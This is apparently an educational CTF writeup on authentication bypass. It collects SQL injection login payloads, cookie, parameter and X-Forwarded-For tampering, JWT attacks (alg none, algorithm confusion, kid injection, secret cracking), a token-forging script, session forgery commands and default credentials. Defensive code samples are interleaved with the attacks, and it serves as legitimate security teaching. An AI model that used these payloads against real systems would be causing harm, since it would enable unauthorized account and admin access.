Authentication Bypass

Intermediate | 30 min | Writeup

Breaking authentication in CTF challenges

Learning Objectives

  • Find authentication flaws
  • Exploit JWT vulnerabilities
  • Bypass login mechanisms
  • Forge sessions

Authentication bypass challenges test your ability to access restricted areas without valid credentials. From simple parameter tampering to complex JWT attacks, these challenges are CTF favorites!

Authentication bypass is about finding logic flaws, not just guessing passwords. Think about HOW the authentication works, then break that logic.

Simple Bypasses

bash
# Parameter manipulation
# Original request
POST /login
admin=false&user=guest

# Modified request
POST /login
admin=true&user=guest

# URL parameter bypass
http://target.com/admin?authenticated=true
http://target.com/admin?role=admin
http://target.com/admin?isAdmin=1

# Cookie manipulation
# Original cookie
Cookie: role=user; authenticated=false

# Modified cookie
Cookie: role=admin; authenticated=true

# Header manipulation
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Host: localhost

View Everything

In Burp, examine EVERY parameter - URL, body, cookies, and headers. Any of these could control authentication!
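For contrast, here is the server side that makes every tampering shown above a no-op: the role is looked up in a server-side session record keyed by an opaque id, and X-Forwarded-For is honoured only when the TCP peer is the site's own proxy. This is an added example, not code from the writeup; the session store, the session ids and the proxy address 10.0.0.2 are constructed assumptions.

```python
import ipaddress

# Constructed in-memory session store: opaque session id -> server-side record.
# The role lives here, never in the cookie, so "role=admin" or
# "authenticated=true" in the Cookie header has nothing to influence.
SESSIONS = {
    "a7f3c9e1d2b4": {"user": "guest", "role": "user"},
    "0c1d2e3f4a5b": {"user": "alice", "role": "admin"},
}

# Assumed deployment: a single reverse proxy at 10.0.0.2 appends the real
# client address to X-Forwarded-For before handing the request to the app.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}


def parse_cookies(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}; malformed parts are skipped."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def client_ip(peer_ip, headers):
    """Resolve the client address. X-Forwarded-For is used only when the TCP
    peer is our own proxy; from anyone else it is attacker-controlled and
    ignored. The rightmost entry is the one the trusted proxy appended."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For", "")
    if xff and peer in TRUSTED_PROXIES:
        try:
            return ipaddress.ip_address(xff.split(",")[-1].strip())
        except ValueError:        # malformed value from the proxy: fall back
            return peer
    return peer


def is_internal(peer_ip, headers):
    """Loopback-only restriction, evaluated on the resolved address."""
    return client_ip(peer_ip, headers).is_loopback


def is_admin_request(headers):
    """Authorization for /admin comes from the server-side session record;
    role/admin/authenticated values sent by the client are never consulted."""
    cookies = parse_cookies(headers.get("Cookie", ""))
    session = SESSIONS.get(cookies.get("sid", ""))
    return session is not None and session["role"] == "admin"
```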

SQL Injection Auth Bypass

sql
-- Classic authentication bypass
Username: admin'-- -
Password: anything

-- Query becomes:
-- SELECT * FROM users WHERE username='admin'-- -' AND password='anything'
-- The -- comments out the password check!

-- Other variations:
admin'#
admin'/*
' OR '1'='1'-- -
' OR 1=1-- -
' OR ''='
') OR ('1'='1'-- -

-- When username is validated first:
admin'--
admin'#
admin'/*

-- Bypass with UNION
' UNION SELECT 'admin','password_hash' -- -
-- Returns a fabricated row whose password hash you chose
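The login query built both ways, so the admin'-- - payload from above can be watched succeeding against string concatenation and failing against bound parameters. Added example, not from the writeup; the sqlite in-memory users table and the password "correct horse" are constructed, and sha256 stands in for a real password hash only to keep the block short.

```python
import hashlib
import sqlite3


def pw_hash(password):
    # sha256 for brevity; a real service would use a slow password hash
    # (bcrypt/scrypt/argon2). The injection behaviour is the same either way.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory users table with a single admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("correct horse")))
    return db


def login_vulnerable(db, username, password):
    """String concatenation: admin'-- - closes the quote, and the rest of the
    WHERE clause, including the password check, becomes a comment."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{pw_hash(password)}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Bound parameters: the quote and comment sequence are passed as data,
    so the only way to match a row is to know the password."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, pw_hash(password)),
    ).fetchone()
    return row[0] if row else None
```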

JWT Vulnerabilities

JSON Web Tokens (JWTs) are common in modern applications. They have several well-known vulnerabilities:

bash
# JWT Structure: header.payload.signature
# eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.signature

# Decode JWT payload (base64url; pad to a multiple of 4 so base64 -d accepts it)
echo "eyJ1c2VyIjoiZ3Vlc3QifQ==" | base64 -d
# {"user":"guest"}

# Attack 1: Algorithm None
# Change header to: {"alg":"none"}
# Remove signature
# eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.

# Attack 2: Algorithm Confusion (RS256 → HS256)
# If server uses RS256 (asymmetric), try changing to HS256
# Sign with the PUBLIC key as the secret!

# Attack 3: Weak Secret
# Brute force the secret
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
# Or use jwt_tool
python3 jwt_tool.py JWT_HERE -C -d wordlist.txt

# Attack 4: Key ID (kid) Injection
# Header: {"alg":"HS256","kid":"../../dev/null"}
# Sign with empty secret

# Attack 5: JWK Header Injection
# Include your own key in the header
python
# Python script to forge JWT with algorithm none
import base64
import json

header = {"alg": "none", "typ": "JWT"}
payload = {"user": "admin", "role": "admin"}


# Base64url-encode a JSON object without padding, as JWT segments are written
def b64url(data):
    return base64.urlsafe_b64encode(
        json.dumps(data).encode()
    ).decode().rstrip('=')


# Encode without signature: header.payload. with an empty third segment
token = f"{b64url(header)}.{b64url(payload)}."
print(token)

JWT algorithm "none" is a classic CTF vulnerability. Many real-world libraries have fixed this, but CTF challenges still use it!
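The defensive counterpart to the forging script: a stdlib-only HS256 verifier that decides the algorithm from server configuration rather than from the token header, which is what both the "none" token above and the RS256 → HS256 confusion depend on. Added example, not from the writeup or any JWT library; sign_hs256 is a constructed issuer used only to produce test tokens, and the secret is a placeholder.

```python
import base64
import hashlib
import hmac
import json


def b64url(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload, secret):
    """Constructed issuer side: JSON header and payload, HMAC-SHA256 over the
    two base64url segments, the same layout the writeup decodes above."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header).encode()) + "."
                     + b64url(json.dumps(payload).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token, secret):
    """Return the payload only if the token has three segments, its header
    declares the algorithm this server is configured for, and the HMAC
    matches. The header never gets to pick the verification routine."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except ValueError:            # wrong segment count, bad base64, bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None               # rejects "none" and any other algorithm
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), s):
        return None               # missing, empty or forged signature
    try:
        return json.loads(b64url_decode(p))
    except ValueError:
        return None
```

A production verifier additionally checks registered claims such as exp and iss; this block covers only the algorithm and signature checks that the attacks listed above target.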

Session Manipulation

bash
# Cookie value manipulation
# Flask session (base64 encoded JSON)
eyJ1c2VyIjoiZ3Vlc3QifQ.XXX.YYY

# Decode the first segment (pad to a multiple of 4 so base64 -d accepts it):
echo "eyJ1c2VyIjoiZ3Vlc3QifQ==" | base64 -d
# {"user":"guest"}

# If unsigned or weak secret, forge:
# {"user":"admin"}

# PHP Serialization in cookies
# Original: O:4:"User":1:{s:4:"name";s:5:"guest";}
# Modified: O:4:"User":1:{s:4:"name";s:5:"admin";}

# Session fixation
# 1. Get valid session: PHPSESSID=abc123
# 2. Send victim link with your session
# 3. When they login, you have their session

# Session prediction
# If sessions are predictable (sequential, timestamp-based)
# Generate and test potential session IDs
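The fixation and prediction items above are both closed on the server side by generating ids from a CSPRNG and issuing a fresh id at login, so an id planted before authentication never becomes an authenticated session. Added example, not from the writeup; SessionStore is an assumed in-memory stand-in for a real session backend.

```python
import secrets


class SessionStore:
    """Constructed in-memory store: opaque session id -> server-side record."""

    def __init__(self):
        self._data = {}

    @staticmethod
    def _new_id():
        # 256 bits from the OS CSPRNG: neither sequential nor timestamp-derived,
        # so there is nothing for session prediction to extrapolate from.
        return secrets.token_urlsafe(32)

    def new_anonymous(self):
        """Pre-login session, e.g. for a shopping basket; carries no user."""
        sid = self._new_id()
        self._data[sid] = {"user": None}
        return sid

    def login(self, presented_sid, user):
        """Successful authentication discards whatever id the client presented
        (it may have been planted via a link, as in the fixation steps above)
        and issues a fresh one bound to the user."""
        self._data.pop(presented_sid, None)
        sid = self._new_id()
        self._data[sid] = {"user": user}
        return sid

    def logout(self, sid):
        self._data.pop(sid, None)

    def user_for(self, sid):
        """Who is logged in on this id, or None if unknown or anonymous."""
        return self._data.get(sid, {}).get("user")
```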

Logic Flaws

# Type juggling (PHP)
# "0e12345" == "0e67890" (both evaluate to 0 in comparison)
# Use magic hashes that start with 0e and are valid MD5
# 240610708 → 0e462097431906509019562988736854

# Password reset flaws
# 1. Request reset for admin
# 2. Intercept reset link parameters
# 3. Modify token/user identifier
# 4. Reset admin's password

# Registration flaws
# Register as: admin (with space)
# Register as: admin
# Register as: ADmin (case manipulation after registration)

# Race conditions
# 1. Two parallel requests:
#    - Register user "admin"
#    - Login as "admin"
# 2. Timing can grant elevated access

# Negative value attacks
# quantity=-1 → negative total price
# Transfer -$100 → receive money

# Default credentials
admin:admin
admin:password
admin:123456
root:root
test:test

Think Like a Developer

What shortcuts might a developer take? What edge cases might they forget? Authentication logic is complex - there are always flaws!

Useful Tools

bash
# jwt_tool - JWT analysis and attacks
git clone https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py eyJhbGc...

# Scan for known vulnerabilities
python3 jwt_tool.py -t JWT -M at

# Crack secret
python3 jwt_tool.py -t JWT -C -d wordlist.txt

# flask-unsign - Flask session manipulation
pip install flask-unsign

# Decode session
flask-unsign --decode --cookie "eyJ..."

# Crack secret
flask-unsign --unsign --cookie "eyJ..." --wordlist wordlist.txt

# Forge cookie
flask-unsign --sign --cookie "{'user':'admin'}" --secret "SECRET"

# Online tools
# jwt.io - Decode and verify JWTs
# cyberchef - Encode/decode sessions

Auth Bypass Checklist

□ Check for direct URL access to admin pages
□ Manipulate cookies (role, admin, authenticated)
□ Modify POST parameters
□ Try SQL injection in login
□ Check for JWT vulnerabilities
□ Test default credentials
□ Look for password reset flaws
□ Check for registration flaws
□ Test IP-based restrictions with X-Forwarded-For
□ Try HTTP method manipulation (GET vs POST)
□ Look for backup login endpoints (/login2, /admin/login)
□ Check for exposed credentials in JS/source
□ Try type juggling attacks (PHP)
□ Test for race conditions

Key Takeaways

  • Always check cookies, headers, and parameters for auth-related values
  • SQL injection in login is a classic - always test it
  • JWT "algorithm none" is a common CTF vulnerability
  • Logic flaws are often more valuable than brute force
  • Use jwt_tool and flask-unsign for session analysis
  • Think about HOW authentication works, then break that logic